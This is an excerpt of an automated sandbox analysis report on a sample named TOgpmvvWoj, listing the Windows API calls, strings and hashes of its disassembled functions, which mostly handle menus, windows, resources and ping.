                                            • Opcode Fuzzy Hash: 9b479d9777a4b32b555306fc5eedfcb55f94b16c000214e683f94cdddf024eb0
                                            • Instruction Fuzzy Hash: F25181311083059BC710EF14C891AAEB7E5EFC4704F58A82DF59A772A2DB319D4ACA53
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                              • Part of subcall function 00E12344: GetCursorPos.USER32(?), ref: 00E12357
                                              • Part of subcall function 00E12344: ScreenToClient.USER32(00ED67B0,?), ref: 00E12374
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000001), ref: 00E12399
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000002), ref: 00E123A7
                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E9C2E4
                                            • ImageList_EndDrag.COMCTL32 ref: 00E9C2EA
                                            • ReleaseCapture.USER32 ref: 00E9C2F0
                                            • SetWindowTextW.USER32(?,00000000), ref: 00E9C39A
                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E9C3AD
                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E9C48F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
                                            • API String ID: 1924731296-488423084
                                            • Opcode ID: 2827936a1c18b8d162a267496c9c4646671dc5185820bdbb8b351f282a4325cd
                                            • Instruction ID: a89839b83c8893ca65d3b2a858e2643a1be2d4a3ffe11800a2f10276228f7b3e
                                            • Opcode Fuzzy Hash: 2827936a1c18b8d162a267496c9c4646671dc5185820bdbb8b351f282a4325cd
                                            • Instruction Fuzzy Hash: 3A51CE74204304AFDB04EF20DC96FAA3BE5EF88314F10552EF595AB2E1DB309989DB52
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __i64tow__itow__swprintf
                                            • String ID: %.15g$0x%p$False$True
                                            • API String ID: 421087845-2263619337
                                            • Opcode ID: e153a67846504fd8895d1777d91d8f160930cce20cf602c8acdf4f3c27f71ed1
                                            • Instruction ID: 29d58d9e588fa277ad69d1969ffcedd0a1b623cd83a08dc25b9dda1fb64283fe
                                            • Opcode Fuzzy Hash: e153a67846504fd8895d1777d91d8f160930cce20cf602c8acdf4f3c27f71ed1
                                            • Instruction Fuzzy Hash: D3412771604205AFDB24DF78DC46FB677E8EF84704F20686EE649F7292EA319881CB11
                                            APIs
                                            • _memset.LIBCMT ref: 00E973D9
                                            • CreateMenu.USER32 ref: 00E973F4
                                            • SetMenu.USER32(?,00000000), ref: 00E97403
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E97490
                                            • IsMenu.USER32(?), ref: 00E974A6
                                            • CreatePopupMenu.USER32 ref: 00E974B0
                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E974DD
                                            • DrawMenuBar.USER32 ref: 00E974E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                            • String ID: 0$F
                                            • API String ID: 176399719-3044882817
                                            • Opcode ID: f9b43928ff5f5300c81625270053908452e61cab0037b2749b51c2bd4b93558f
                                            • Instruction ID: d7746cbf89d8ece56881f9afbe5812f4ec9464e92be81a2514c2e8c0c5f5f8c7
                                            • Opcode Fuzzy Hash: f9b43928ff5f5300c81625270053908452e61cab0037b2749b51c2bd4b93558f
                                            • Instruction Fuzzy Hash: D5416578A01209EFDF20DF65D884A9ABBF9FF49305F14002AE9A5A7361D730AD18CB50
                                            APIs
                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E977CD
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00E977D4
                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E977E7
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E977EF
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E977FA
                                            • DeleteDC.GDI32(00000000), ref: 00E97803
                                            • GetWindowLongW.USER32(?,000000EC), ref: 00E9780D
                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E97821
                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E9782D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                            • String ID: static
                                            • API String ID: 2559357485-2160076837
                                            • Opcode ID: 4d61c4107b5e8bfa17042da99456dd5e0247b6698f45278b194c8728ab023090
                                            • Instruction ID: 3bb3882332c2b57b86a3abb6c829209a39e190550bc588a89dcf837fddbafc6c
                                            • Opcode Fuzzy Hash: 4d61c4107b5e8bfa17042da99456dd5e0247b6698f45278b194c8728ab023090
                                            • Instruction Fuzzy Hash: D931AA72111215BFDF219FA5DC08FDA3B69EF09325F100226FA55F20A0C731D825DBA0
                                            APIs
                                            • _memset.LIBCMT ref: 00E3707B
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            • __gmtime64_s.LIBCMT ref: 00E37114
                                            • __gmtime64_s.LIBCMT ref: 00E3714A
                                            • __gmtime64_s.LIBCMT ref: 00E37167
                                            • __allrem.LIBCMT ref: 00E371BD
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E371D9
                                            • __allrem.LIBCMT ref: 00E371F0
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E3720E
                                            • __allrem.LIBCMT ref: 00E37225
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E37243
                                            • __invoke_watson.LIBCMT ref: 00E372B4
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                            • String ID:
                                            • API String ID: 384356119-0
                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                            • Instruction ID: 2864e30f306e40e5654f9def76df3480c304d67fc459a74bb95e18d8f145c202
                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                            • Instruction Fuzzy Hash: 0C71F8F2A08706ABD7249E79CC85B5BBBE8AF11324F14522AF854F76D1E770D900CB90
                                            APIs
                                            • _memset.LIBCMT ref: 00E72A31
                                            • GetMenuItemInfoW.USER32(00ED6890,000000FF,00000000,00000030), ref: 00E72A92
                                            • SetMenuItemInfoW.USER32(00ED6890,00000004,00000000,00000030), ref: 00E72AC8
                                            • Sleep.KERNEL32(000001F4), ref: 00E72ADA
                                            • GetMenuItemCount.USER32(?), ref: 00E72B1E
                                            • GetMenuItemID.USER32(?,00000000), ref: 00E72B3A
                                            • GetMenuItemID.USER32(?,-00000001), ref: 00E72B64
                                            • GetMenuItemID.USER32(?,?), ref: 00E72BA9
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E72BEF
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E72C03
                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E72C24
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                            • String ID:
                                            • API String ID: 4176008265-0
                                            • Opcode ID: 362f28cbfc93cd30e65ad595f61a2e2d7a985a984f32f364e43dc4c3daba830e
                                            • Instruction ID: 976cab581b8f8a1ac1c32aaf63cf04cbe48985677685039965d8d3599f2e5552
                                            • Opcode Fuzzy Hash: 362f28cbfc93cd30e65ad595f61a2e2d7a985a984f32f364e43dc4c3daba830e
                                            • Instruction Fuzzy Hash: 0461BFB0900249AFDB21CF64DC88EBEBBB8EB41308F14955EEA45B7251D731AD49DB21
                                            APIs
                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E97214
                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E97217
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9723B
                                            • _memset.LIBCMT ref: 00E9724C
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E9725E
                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E972D6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$LongWindow_memset
                                            • String ID:
                                            • API String ID: 830647256-0
                                            • Opcode ID: 6f0e1f65a951bf6361573bf6420bd398255f2f20d6aa6d468e30951fd2ee5dfe
                                            • Instruction ID: aff5c920b1efcf2973a9addc3bfe4aa676df62ed443d55d0691d85aee93af6b6
                                            • Opcode Fuzzy Hash: 6f0e1f65a951bf6361573bf6420bd398255f2f20d6aa6d468e30951fd2ee5dfe
                                            • Instruction Fuzzy Hash: A8615975A00208AFDB10DFA4CD81EEE77F8EB09714F14416AFA54B72A1D770AD49DBA0
                                            APIs
                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E67135
                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00E6718E
                                            • VariantInit.OLEAUT32(?), ref: 00E671A0
                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E671C0
                                            • VariantCopy.OLEAUT32(?,?), ref: 00E67213
                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E67227
                                            • VariantClear.OLEAUT32(?), ref: 00E6723C
                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00E67249
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E67252
                                            • VariantClear.OLEAUT32(?), ref: 00E67264
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E6726F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                            • String ID:
                                            • API String ID: 2706829360-0
                                            • Opcode ID: f850e6c8bd898fe9cbf8c5006c69bdad6a699afd54854321a41f5a2b5cd726fe
                                            • Instruction ID: c66beb074d30f7cc16739a43f1311bf827c899f8c80a75976b8393fdd03fa6d6
                                            • Opcode Fuzzy Hash: f850e6c8bd898fe9cbf8c5006c69bdad6a699afd54854321a41f5a2b5cd726fe
                                            • Instruction Fuzzy Hash: ED416071A40219AFCF00DF65D8589EEBBB9FF48354F00906AF955F7261CB30A949CB90
                                            APIs
                                            • WSAStartup.WSOCK32(00000101,?), ref: 00E85AA6
                                            • inet_addr.WSOCK32(?,?,?), ref: 00E85AEB
                                            • gethostbyname.WSOCK32(?), ref: 00E85AF7
                                            • IcmpCreateFile.IPHLPAPI ref: 00E85B05
                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E85B75
                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E85B8B
                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E85C00
                                            • WSACleanup.WSOCK32 ref: 00E85C06
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                            • String ID: Ping
                                            • API String ID: 1028309954-2246546115
                                            • Opcode ID: 9f9da6b19b9a98e5341b0523b3f1128afab3300780302347dd1e9bf8a6b69508
                                            • Instruction ID: a1d164818813d9336f2ae2324378f17e6dd6c24d0224e557b89e1c0eb152627c
                                            • Opcode Fuzzy Hash: 9f9da6b19b9a98e5341b0523b3f1128afab3300780302347dd1e9bf8a6b69508
                                            • Instruction Fuzzy Hash: 7B517C326047009FDB20AF25DC85B6ABBE4EF48714F14996AF55EFB2A1DB70EC448B41
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7B73B
                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E7B7B1
                                            • GetLastError.KERNEL32 ref: 00E7B7BB
                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00E7B828
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Error$Mode$DiskFreeLastSpace
                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                            • API String ID: 4194297153-14809454
                                            • Opcode ID: 472bdc384c247f8c798612457274f9c4cc97ec31db33b2c317edb525c6f79a70
                                            • Instruction ID: 84355556dc86fb578d392f9f7023a454a6b3a6c16bd851521f873422041a8307
                                            • Opcode Fuzzy Hash: 472bdc384c247f8c798612457274f9c4cc97ec31db33b2c317edb525c6f79a70
                                            • Instruction Fuzzy Hash: 63317E35A00209AFDB08EF64D889FFE77B8EF84704F14912AE50AF7292DB719946C751
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E694F6
                                            • GetDlgCtrlID.USER32 ref: 00E69501
                                            • GetParent.USER32 ref: 00E6951D
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E69520
                                            • GetDlgCtrlID.USER32(?), ref: 00E69529
                                            • GetParent.USER32(?), ref: 00E69545
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E69548
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1536045017-1403004172
                                            • Opcode ID: 405e941e0ff518216727cd11aa8abd927bbe96f27f2ab4f135f76df741d07be0
                                            • Instruction ID: fb35080617dfc017b924c5f303f17781b94ce51ecaf32fe4c56a0e275052d131
                                            • Opcode Fuzzy Hash: 405e941e0ff518216727cd11aa8abd927bbe96f27f2ab4f135f76df741d07be0
                                            • Instruction Fuzzy Hash: C821E270A40204BFCF00AB61DC85EFEBBB8EF49300F10111AF562A72A3DB7559599A60
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E695DF
                                            • GetDlgCtrlID.USER32 ref: 00E695EA
                                            • GetParent.USER32 ref: 00E69606
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E69609
                                            • GetDlgCtrlID.USER32(?), ref: 00E69612
                                            • GetParent.USER32(?), ref: 00E6962E
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E69631
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1536045017-1403004172
                                            • Opcode ID: 69e8c6861a7492128afb562c55778dfcfc6820e5951c814c3479e8b49071676a
                                            • Instruction ID: 41219290a87109ea6c44b6ba1d2d46d55021482f03547bb57fe048949cd71c27
                                            • Opcode Fuzzy Hash: 69e8c6861a7492128afb562c55778dfcfc6820e5951c814c3479e8b49071676a
                                            • Instruction Fuzzy Hash: 1C21F271A40204BFDF00AB61CC85EFEBBB8EF58300F101016F962B72A2DB759959DB60
                                            APIs
                                            • GetParent.USER32 ref: 00E69651
                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00E69666
                                            • _wcscmp.LIBCMT ref: 00E69678
                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E696F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameParentSend_wcscmp
                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                            • API String ID: 1704125052-3381328864
                                            • Opcode ID: 3080a2330bd4acbf006af5248f1003e45e79c177118b7854a87f4a3bc7cd7c0d
                                            • Instruction ID: 6fe1fe49f2e67c6ab987e956fb13fd84559b38d65f7a23b36ec4a936c882741a
                                            • Opcode Fuzzy Hash: 3080a2330bd4acbf006af5248f1003e45e79c177118b7854a87f4a3bc7cd7c0d
                                            • Instruction Fuzzy Hash: A111A776288307BAEA012631EC0EDEAB79C9B057B4F20202BF910F50D3FE7269518658
                                            APIs
                                            • __swprintf.LIBCMT ref: 00E7419D
                                            • __swprintf.LIBCMT ref: 00E741AA
                                              • Part of subcall function 00E338D8: __woutput_l.LIBCMT ref: 00E33931
                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E741D4
                                            • LoadResource.KERNEL32(?,00000000), ref: 00E741E0
                                            • LockResource.KERNEL32(00000000), ref: 00E741ED
                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 00E7420D
                                            • LoadResource.KERNEL32(?,00000000), ref: 00E7421F
                                            • SizeofResource.KERNEL32(?,00000000), ref: 00E7422E
                                            • LockResource.KERNEL32(?), ref: 00E7423A
                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E7429B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                            • String ID:
                                            • API String ID: 1433390588-0
                                            • Opcode ID: 3dec4e8c6ebec2fe3a1259912a76627eda885e61a64533886c8d78dc6ab544cb
                                            • Instruction ID: c0eedbdaa4715028ceecbc796ffb4849316f1305c322659509928915f8d9f369
                                            • Opcode Fuzzy Hash: 3dec4e8c6ebec2fe3a1259912a76627eda885e61a64533886c8d78dc6ab544cb
                                            • Instruction Fuzzy Hash: E23182B160525AAFDB119F61EC48EBB7BACEF04305F048526FD05F21A1E770DA61CBA1
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00E71700
                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E71714
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00E7171B
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E70778,?,00000001), ref: 00E7172A
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7173C
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E70778,?,00000001), ref: 00E71755
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E70778,?,00000001), ref: 00E71767
                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E717AC
                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E717C1
                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E717CC
                                            Memory Dump Source
